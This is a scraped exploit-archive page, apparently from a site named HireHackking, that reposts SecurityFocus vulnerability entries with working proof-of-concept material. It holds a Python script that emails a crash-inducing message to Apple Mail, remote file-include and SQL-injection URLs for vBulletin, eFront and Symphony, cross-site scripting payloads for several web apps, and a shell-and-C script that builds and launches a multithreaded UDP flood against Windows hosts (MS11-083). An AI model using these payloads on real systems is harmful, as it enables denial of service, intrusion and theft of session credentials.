  • Windows Privilege Escalation for OSCP & Beyond!
  • Windows-PrivEsc-Setup
  • Tweet Original de la vulnerabilidad en dispositivos Razer
  • Razer bug lets you become a Windows 10 admin by plugging in a mouse
  • You Can Get Admin Privileges On Windows 10 With A Razer Mouse
HireHackking 
source: https://www.securityfocus.com/bid/50446/info

Apple Mac OS X and iOS are prone to a denial-of-service vulnerability.

Attackers can exploit this issue to cause the affected mail client to crash, effectively denying service. 

#!/usr/bin/env python

# Mail of death for Apple's Mail.app
#
# Tested & vulnerable:  Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42

import smtplib

n_attach=2040 # ~2024 is sufficient
relay='your.mta.goes.here'
mailfrom = 'mail_of_death@example.com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'


def craft_mail():
    header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
    body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
    attach = '--delim\nContent-Disposition: inline\n\n'*n_attach

    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n'*n_attach
    return header + body + attach


def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()

mail=craft_mail()
#print mail
send_mail (mail)
HireHackking 
source: https://www.securityfocus.com/bid/50455/info

vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

vBulletin 4.1.7 is vulnerable; other versions may also be affected. 

http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/50456/info

Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.

These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
For demonstration or reproduce ...

1.1
Code Review: HQ Roles  [IVE - Persistent]

<td width="30%" class="BlockContent">
<!-- END VIEW MODE --> 
</td></tr><tr valign="top">
<td width="20%" class="BlockLabel">Dashboard Name:</td>
<td width="30%" class="BlockContent">
<span id="dashboardString">New Role Dashboard</span></td>
<td width="20%" class="BlockLabel"></td>
<td width="30%" class="BlockContent"></td></tr></table>
<!--  /  -->


Code Review: java.security.krb5.kdc   Module: HQ Health / HQ Process Information & Diagnostics  [IVE - Persistent]

- java.rmi.server.codebase = http://h1461735:9093/ 
- java.rmi.server.hostname = h1461735 
- java.runtime.name = Java(TM) SE Runtime Environment 
- java.runtime.version = 1.6.0_13-b03 
- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.specification.name = Java Platform API Specification 
- java.specification.vendor = Sun Microsystems Inc. 
- java.specification.version = 1.6 
- java.vendor = Sun Microsystems Inc. 

.../PoC/printReport(poc).hqu



Code Review: Browse - Monitor - Indikators  [IVE - Persistent]


hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
            if (arguments.callee.done) return;

... or

  hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
  hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
  <title>
   >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
  </title>
    <script type="text/javascript">
        var onloads = [];
         function initOnloads() {
        
            if (arguments.callee.done) return;
            arguments.callee.done = true;
           if(typeof(_timer)!="undefined") clearInterval(_timer);
           for ( var i = 0 ; i < onloads.length ; i++ )
             onloads[i]();



Code Review: Applications � All Applications - Topic  [IVE - Persistent]

<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>



Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]

<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: 
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert 
String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
  at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
  at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
  at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
  at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
  at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
  at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
  at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
  at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
  at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
  at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
  at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
  at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
  at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
  at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
  at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
  at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
  at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
  at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
  at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
  at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
  at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
  at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
  at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
  at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
  at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
  at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
  at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
  at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
  at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
  at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
  at java.lang.Thread.run(Unknown Source) </div>


1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=




Code Review: Escalation Schemes Configuration [XSS]

http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]

References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=
HireHackking 
source: https://www.securityfocus.com/bid/50454/info

Domain Shop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php
Search Box
"><script>alert(document.domain)</script>
HireHackking 
source: https://www.securityfocus.com/bid/50468/info

IBSng is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/IBSng/util/show_multistr.php?str=[xss]
HireHackking 
source: https://www.securityfocus.com/bid/50469/info

eFront is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 

http://example.com/administrator.php?ctg=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&user=admin&op=dashboard

http://example.com/administrator.php?ctg=personal&user='%20stYle=x:expre/**/ssion(alert(9))%20ns='%20&op=dashboard

http://example.com/administrator.php?ctg=calendar&view_calendar=%22%20stYle=x:expre/**/ssion(alert(9))%20ns=%22

http://example.com/index.php?ctg=lesson_info&lessons_ID=2&course='%20stYle='x:expre/**/ssion(alert(9))
HireHackking 
source: https://www.securityfocus.com/bid/50470/info

Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Symphony versions prior to 2.2.4 are vulnerable. 

http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>
HireHackking 
source: https://www.securityfocus.com/bid/50470/info

Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Symphony versions prior to 2.2.4 are vulnerable. 

http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'
HireHackking 
source: https://www.securityfocus.com/bid/50492/info

eFront is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the software fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/index.php?message=1&message_type=%22%20onmouseover=alert%28document.cookie%29%3E

http://www.example.com/professor.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29

http://www.example.com/student.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29

Successful following exploit requires attacker to be registered and logged-in:

http://www.example.com/view_test.php?done_test_id=1%20union%20select%201,2,%28select%20version%28%29%29,4,5,6,7,8,9,10, 11,12%20--%20

Successful following exploits require that "magic_quotes_gpc" is off:

http://www.example.com/view_test.php?test_id=1&user=%27SQL_CODE_HERE

http://www.example.com/view_test.php?content_id=2&user=%27SQL_CODE_HERE

http://www.example.com/modules/module_chat/admin.php?force=getLessonFromId&loglessonid=-1%27%20union%20select%20ver sion%28%29%20--%202

http://www.example.com/ask_information.php?common_lessons=1&user1=professor&user2=%27%20union%20select%201,vers ion%28%29%20--%20
HireHackking 
source: https://www.securityfocus.com/bid/50502/info

Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

This issue affects Serendipity 1.5.5; prior versions may also be affected. 

http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go=+-+Go!+-+
HireHackking 
source: https://www.securityfocus.com/bid/50512/info

CmyDocument is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

POST http://www.example.com/login.asp
username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++

POST http://www.example.com/login2.asp
username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++

http://www.example.com/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

http://www.example.com/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
HireHackking 
// source: https://www.securityfocus.com/bid/50517/info

Microsoft Windows is prone to a remote integer-overflow vulnerability that affects the TCP/IP stack.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts may result in a denial-of-service condition. 

#!/bin/sh
cat >> winnuke2011.c << EOF
/*
* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow  
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This 
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP  
* echo packets. This exploit creates 250 threads and 
* floods a host with UDP packets and then attempts to
* trigger the de-ref using ping. I calculated that it
* would take approximately 52 days for the host to 
* enter a condition where this vulnerability is 
* triggerable. 
*
* -- prdelka 
*/
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h> 
#include <sys/time.h> 

int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);

int main(int argc, char *argv[]) {
       pthread_t thread;
       int iret,lthreads;
  pid_t pid;
  printf("[+] MS11-083 DoS/PoC exploit\n");
  if(argc<3){
    printf("[!] Usage : %s <server> <port>\n", argv[0]);
    exit(1);
  }
  char *const args[] = {"ping",argv[1],NULL};
  char *const envp[] = {"",NULL};
  port = atoi(argv[2]);
  for(lthreads=0;lthreads<250;lthreads++){//UDP flood
    iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
    printf("[-] Thread number %d started\n",lthreads);
    sleep(1);
  }
  printf("[-] One does not simply barrel roll into Mordor\n");
  pid = fork();
  if(pid==0){// trigger deref.
    execve("./ping.sh",args,envp);
  };
  while(active){
  }
  printf("[-] You are finished. Patience is a virtue.\n");
  exit(0);
}

void *sendpackets(void *ptr)
{
  int sd, rc, n, echoLen, flags, error, timeOut;
  unsigned long i;
  struct sockaddr_in remoteServAddr;
  struct hostent *h;
  char str[41];
  pthread_mutex_lock(&mutexactive);
  active++;
  pthread_mutex_unlock(&mutexactive);
     srand(time(NULL));
     for (i = 0;i < 40;++i){
    str[i] = (char)((rand() % 78) + 30);
     }
     str[40] = '\0'; // yes this was off-by-one. :(
  printf("[-] Sending payload '%s'\n",str);
    h = gethostbyname(ptr);
  if(h==NULL) {
        printf("unknown host '%s' \n",(char*)ptr);
        exit(1);
    }
  remoteServAddr.sin_family = h->h_addrtype;
  memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
  remoteServAddr.sin_port = htons(port);
  sd = socket(AF_INET,SOCK_DGRAM,0);
  if(sd<0){
    printf("[!] Cannot open socket\n");
    pthread_exit((void*)0);
  }
  flags = 0;
  for(i=0;i<4294967295;i++){
    rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
    if(rc<0){
      printf("[!] Cannot send data\n");
            close(sd);
      pthread_exit((void*)0);
        }
  }
  pthread_mutex_lock(&mutexactive);
  active--;
  pthread_mutex_unlock(&mutexactive);
  pthread_exit(NULL);
}
EOF
cat >> ping.sh << EOF
#!/bin/sh
while \`true\`;do /sbin/ping -c 1 \$1;done
EOF
chmod +x ping.sh
gcc winnuke2011.c -o winnuke2011 
./winnuke2011